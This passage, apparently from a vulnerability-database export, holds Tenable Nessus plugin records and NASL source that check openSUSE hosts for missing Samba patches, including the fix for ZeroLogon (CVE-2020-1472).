reference:\"libsamba-passdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-pcp-pmda / ctdb-pcp-pmda-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T08:17:15", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.", "edition": 4, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-09-25T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-2020-1513)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-09-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:samba-libs-python-debuginfo", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:samba-python-debuginfo", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:samba-pidl", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:samba-libs-python", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy-python-devel", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:samba-python", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2020-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/140797", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1513.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140797);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/08\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2020-1513)\");\n script_summary(english:\"Check for the openSUSE-2020-1513 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176579\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n 